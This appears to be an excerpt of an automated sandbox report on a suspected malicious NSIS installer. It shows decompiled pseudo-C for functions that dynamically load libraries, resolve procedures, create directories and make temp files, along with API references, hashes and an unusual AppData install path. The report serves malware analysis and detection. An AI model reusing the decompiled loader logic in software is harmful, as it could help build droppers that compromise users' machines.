                                                            control_flow_graph 991 4020a5-4020b1 992 4020b7-4020cd call 402c39 * 2 991->992 993 40216c-40216e 991->993 1002 4020dc-4020ea LoadLibraryExA 992->1002 1003 4020cf-4020da GetModuleHandleA 992->1003 995 4022e5-4022ea call 401423 993->995 1001 402ac5-402ad4 995->1001 1005 4020ec-4020f9 GetProcAddress 1002->1005 1006 402165-402167 1002->1006 1003->1002 1003->1005 1008 402138-40213d call 405378 1005->1008 1009 4020fb-402101 1005->1009 1006->995 1013 402142-402145 1008->1013 1011 402103-40210f call 401423 1009->1011 1012 40211a-402136 1009->1012 1011->1013 1022 402111-402118 1011->1022 1012->1013 1013->1001 1016 40214b-402153 call 4039dd 1013->1016 1016->1001 1021 402159-402160 FreeLibrary 1016->1021 1021->1001 1022->1013
                                                            C-Code - Quality: 60%
                                                            			E004020A5(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x4524e0");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4524a8 =  *0x4524a8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402C39(0xfffffff0);
				 *(_t34 + 8) = E00402C39(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405378(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x2000, 0x453000, 0x414478, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DD(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                            0x004020a5
                                                            0x004020a5
                                                            0x004020aa
                                                            0x004020b1
                                                            0x0040216c
                                                            0x004022e5
                                                            0x004022e5
                                                            0x00402ac5
                                                            0x00402ac8
                                                            0x00402ad4
                                                            0x00402ad4
                                                            0x004020c0
                                                            0x004020ca
                                                            0x004020cd
                                                            0x004020dc
                                                            0x004020e0
                                                            0x004020e6
                                                            0x004020ea
                                                            0x00402165
                                                            0x00000000
                                                            0x00402165
                                                            0x004020ec
                                                            0x004020f5
                                                            0x004020f9
                                                            0x0040213d
                                                            0x004020fb
                                                            0x004020fe
                                                            0x00402101
                                                            0x00402131
                                                            0x00402103
                                                            0x00402106
                                                            0x0040210f
                                                            0x00402111
                                                            0x00402111
                                                            0x0040210f
                                                            0x00402101
                                                            0x00402145
                                                            0x0040215a
                                                            0x0040215a
                                                            0x00000000
                                                            0x00402145
                                                            0x004020d0
                                                            0x004020d6
                                                            0x004020da
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020D0
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                              • Part of subcall function 00405378: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C), ref: 004053D4
                                                              • Part of subcall function 00405378: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll), ref: 004053E6
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 0040540C
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405426
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405434
                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020E0
                                                            • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020F0
                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 0040215A
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 2987980305-0
                                                            • Opcode ID: 1c2793b13b0e4d36cf3f729b34a9dfc990e088b9ef744f6faa03b8bfef0e7fed
                                                            • Instruction ID: c32ea7a8b3beed88709fb5878bffd466afe3d741a829a911a3d786ad6d955be5
                                                            • Opcode Fuzzy Hash: 1c2793b13b0e4d36cf3f729b34a9dfc990e088b9ef744f6faa03b8bfef0e7fed
                                                            • Instruction Fuzzy Hash: 30210831904215F7DF206FA48F4DAAF3A606F45359F20423BF601B61D1DBFD49819A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040583E Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1023 40583e-405889 CreateDirectoryA 1024 40588b-40588d 1023->1024 1025 40588f-40589c GetLastError 1023->1025 1026 4058b6-4058b8 1024->1026 1025->1026 1027 40589e-4058b2 SetFileSecurityA 1025->1027 1027->1024 1028 4058b4 GetLastError 1027->1028 1028->1026
                                                            C-Code - Quality: 100%
                                                            			E0040583E(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                            0x00405849
                                                            0x0040584d
                                                            0x00405850
                                                            0x00405856
                                                            0x0040585a
                                                            0x0040585e
                                                            0x00405866
                                                            0x0040586d
                                                            0x00405873
                                                            0x0040587a
                                                            0x00405881
                                                            0x00405889
                                                            0x0040588b
                                                            0x00000000
                                                            0x0040588b
                                                            0x00405895
                                                            0x0040589c
                                                            0x004058b2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004058b4
                                                            0x004058b8

                                                            APIs
                                                            • CreateDirectoryA.KERNELBASE(?,0000000B,00485000), ref: 00405881
                                                            • GetLastError.KERNEL32 ref: 00405895
                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058AA
                                                            • GetLastError.KERNEL32 ref: 004058B4
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID:
                                                            • API String ID: 3449924974-0
                                                            • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                            • Instruction ID: 2f5b217c954ff7fbb4119b01485a045b77912d3f79ec2e58d5a645a6a403fb95
                                                            • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                            • Instruction Fuzzy Hash: A7010872C00219EAEF00DBA1C944BEFBBB8EF04355F00803AD945B6290E7789658CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 87%
                                                            			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402C39(0xfffffff0);
				_t13 = E00405C82(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C14(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058BB(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D8(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583E(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                            0x004015bb
                                                            0x004015c2
                                                            0x004015c5
                                                            0x004015ca
                                                            0x004015ce
                                                            0x004015d0
                                                            0x004015d8
                                                            0x004015da
                                                            0x004015dc
                                                            0x004015e0
                                                            0x004015e3
                                                            0x004015fb
                                                            0x004015fc
                                                            0x004015e5
                                                            0x004015e5
                                                            0x004015e8
                                                            0x00000000
                                                            0x004015f3
                                                            0x004015f4
                                                            0x004015f4
                                                            0x004015e8
                                                            0x00401603
                                                            0x0040160a
                                                            0x00401617
                                                            0x00401617
                                                            0x0040160c
                                                            0x0040160d
                                                            0x00401615
                                                            0x00000000
                                                            0x00000000
                                                            0x00401615
                                                            0x0040160a
                                                            0x0040161a
                                                            0x0040161d
                                                            0x0040161f
                                                            0x00401620
                                                            0x004015d0
                                                            0x00401627
                                                            0x00401652
                                                            0x004022e5
                                                            0x00401629
                                                            0x0040162b
                                                            0x00401636
                                                            0x0040163c
                                                            0x00401644
                                                            0x0040164a
                                                            0x0040164a
                                                            0x00401644
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                              • Part of subcall function 00405C82: CharNextA.USER32(?), ref: 00405C90
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                              • Part of subcall function 0040583E: CreateDirectoryA.KERNELBASE(?,0000000B,00485000), ref: 00405881
                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,000000F0), ref: 0040163C
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes, xrefs: 00401631
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes
                                                            • API String ID: 1892508949-4054825685
                                                            • Opcode ID: e8121ef37ac2678a0a0bc0c1c4f9116077d9be17d0c59d1929bed76540fc0f84
                                                            • Instruction ID: b8fbfff880949599704ab61e7222ee5c33c04614f7d3c61f622f7c10b59fc28f
                                                            • Opcode Fuzzy Hash: e8121ef37ac2678a0a0bc0c1c4f9116077d9be17d0c59d1929bed76540fc0f84
                                                            • Instruction Fuzzy Hash: 21110431508141ABDF307BA54D405BF27B49A96324B28453FF9D1B22E3DA3D4942AA3E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405E19 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405E19(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                            0x00405e1d
                                                            0x00405e23
                                                            0x00405e24
                                                            0x00405e24
                                                            0x00405e29
                                                            0x00405e2a
                                                            0x00405e2d
                                                            0x00405e37
                                                            0x00405e44
                                                            0x00405e47
                                                            0x00405e4f
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e53
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e55
                                                            0x00000000
                                                            0x00405e55
                                                            0x00000000

                                                            APIs
                                                            • GetTickCount.KERNEL32(75572754,00485000,?,004033B1,00483000,00485000,00485000,00485000,00485000,00485000,00485000,00403690,?,00000007,00000009,0000000B), ref: 00405E2D
                                                            • GetTempFileNameA.KERNEL32(0000000B,?,00000000,?), ref: 00405E47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: nsa
                                                            • API String ID: 1716503409-2209301699
                                                            • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                            • Instruction ID: db84433a099d66a6ad53f3418d19e52f8fbd3804b66164b4918815a523437c08
                                                            • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                            • Instruction Fuzzy Hash: 9CF0A736348208BBEB109F56ED04B9B7B9CDF91B50F10C03BFA84DB180D6B5DA548798
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C21606 Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E73C21606(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void* _t37;
				intOrPtr _t43;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t55;
				void* _t56;
				signed char _t62;
				signed int _t64;
				signed int _t66;
				struct HINSTANCE__* _t71;
				void* _t72;
				void* _t80;
				void* _t84;
				void* _t85;
				void* _t87;

				_t80 = __esi;
				_t72 = __edi;
				_t55 = __ebx;
				 *0x73c25040 =  *((intOrPtr*)(_t87 + 8));
				 *0x73c2503c =  *((intOrPtr*)(_t87 + 0x64));
				 *0x73c25038 =  *((intOrPtr*)(_t87 + 0x60));
				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x6c)) + 0xc))( *0x73c25014, E73C212F7, _t84);
				_push(1);
				_t37 = E73C22288();
				_t85 = _t37;
				if(_t85 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t85 + 4)) != 1) {
						E73C21EDD(_t85);
					}
					E73C21F58(_t85);
					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
						L14:
						if(( *(_t85 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t37 = E73C22128(_t85);
							} else {
								_push(_t55);
								_push(_t80);
								_push(_t72);
								_t64 = 8;
								_t14 = _t85 + 0x818; // 0x818
								_t56 = _t14;
								memcpy(_t87 + 0x14, _t56, _t64 << 2);
								_t43 = E73C21E71(_t85, _t87 + 0x30);
								 *(_t85 + 0x834) =  *(_t85 + 0x834) & 0x00000000;
								 *((intOrPtr*)(_t85 + 0x820)) = _t43;
								 *_t56 = 3;
								E73C22128(_t85);
								_t66 = 8;
								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
							}
						} else {
							E73C22128(_t85);
							_t37 = GlobalFree(E73C2157E(E73C215F4(_t85)));
						}
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							E73C21F1F(_t85);
							_t62 =  *(_t85 + 0x810);
							_t37 = _t62;
							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
								_t71 =  *(_t85 + 0x808);
								if(_t71 != 0) {
									FreeLibrary(_t71);
									_t37 =  *(_t85 + 0x810);
								}
							}
							if((_t37 & 0x00000020) != 0) {
								_t37 = E73C21558( *0x73c2502c);
							}
						}
						if(( *(_t85 + 0x810) & 0x00000002) == 0) {
							_t37 = GlobalFree(_t85);
						}
						goto L28;
					}
					_t49 =  *_t85;
					if(_t49 == 0) {
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							goto L14;
						}
						E73C22E4F(_t85);
						L12:
						_t85 = _t49;
						L13:
						goto L14;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						L8:
						_t49 = E73C22BC4(_t85); // executed
						goto L12;
					}
					_t51 = _t50 - 1;
					if(_t51 == 0) {
						_push(_t85);
						E73C21774();
						goto L13;
					}
					if(_t51 != 1) {
						goto L14;
					}
					goto L8;
				}
			}



















                                                            0x73c21606
                                                            0x73c21606
                                                            0x73c21606
                                                            0x73c2160d
                                                            0x73c21616
                                                            0x73c21620
                                                            0x73c21634
                                                            0x73c21637
                                                            0x73c21639
                                                            0x73c2163e
                                                            0x73c21643
                                                            0x73c2176f
                                                            0x73c21773
                                                            0x73c21649
                                                            0x73c2164d
                                                            0x73c21650
                                                            0x73c21655
                                                            0x73c21657
                                                            0x73c21661
                                                            0x73c21699
                                                            0x73c216a0
                                                            0x73c216c4
                                                            0x73c21712
                                                            0x73c216c6
                                                            0x73c216c6
                                                            0x73c216c7
                                                            0x73c216c8
                                                            0x73c216cb
                                                            0x73c216d0
                                                            0x73c216d0
                                                            0x73c216dd
                                                            0x73c216e0
                                                            0x73c216e5
                                                            0x73c216ed
                                                            0x73c216f3
                                                            0x73c216f9
                                                            0x73c21709
                                                            0x73c2170a
                                                            0x73c2170e
                                                            0x73c216a2
                                                            0x73c216a3
                                                            0x73c216b8
                                                            0x73c216b8
                                                            0x73c2171c
                                                            0x73c2171f
                                                            0x73c21725
                                                            0x73c2172b
                                                            0x73c21730
                                                            0x73c21738
                                                            0x73c21740
                                                            0x73c21743
                                                            0x73c21749
                                                            0x73c21749
                                                            0x73c21740
                                                            0x73c21751
                                                            0x73c21759
                                                            0x73c2175e
                                                            0x73c21751
                                                            0x73c21766
                                                            0x73c21769
                                                            0x73c21769
                                                            0x00000000
                                                            0x73c21766
                                                            0x73c21666
                                                            0x73c21669
                                                            0x73c2168e
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21691
                                                            0x73c21696
                                                            0x73c21696
                                                            0x73c21698
                                                            0x00000000
                                                            0x73c21698
                                                            0x73c2166b
                                                            0x73c2166e
                                                            0x73c2167a
                                                            0x73c2167b
                                                            0x00000000
                                                            0x73c2167b
                                                            0x73c21670
                                                            0x73c21673
                                                            0x73c21682
                                                            0x73c21683
                                                            0x00000000
                                                            0x73c21683
                                                            0x73c21678
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21678

                                                            APIs
                                                              • Part of subcall function 73C22288: GlobalFree.KERNEL32(?), ref: 73C22901
                                                              • Part of subcall function 73C22288: GlobalFree.KERNEL32(?), ref: 73C22907
                                                              • Part of subcall function 73C22288: GlobalFree.KERNEL32(?), ref: 73C2290D
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C216B8
                                                            • FreeLibrary.KERNEL32(?), ref: 73C21743
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C21769
                                                              • Part of subcall function 73C21EDD: GlobalAlloc.KERNEL32(00000040,?), ref: 73C21F0C
                                                              • Part of subcall function 73C21774: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,73C21688,00000000), ref: 73C21817
                                                              • Part of subcall function 73C21E71: wsprintfA.USER32 ref: 73C21EA4
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                            • String ID:
                                                            • API String ID: 3962662361-0
                                                            • Opcode ID: 7b2daeb0207d7108c4f629dffda72d1afb4130357d6de7775ae1673df354db02
                                                            • Instruction ID: d99aad3fdf7b1f11d15cedd492fdcb3d5e15e34be4f6efbb66f85bd10c4ec8d1
                                                            • Opcode Fuzzy Hash: 7b2daeb0207d7108c4f629dffda72d1afb4130357d6de7775ae1673df354db02
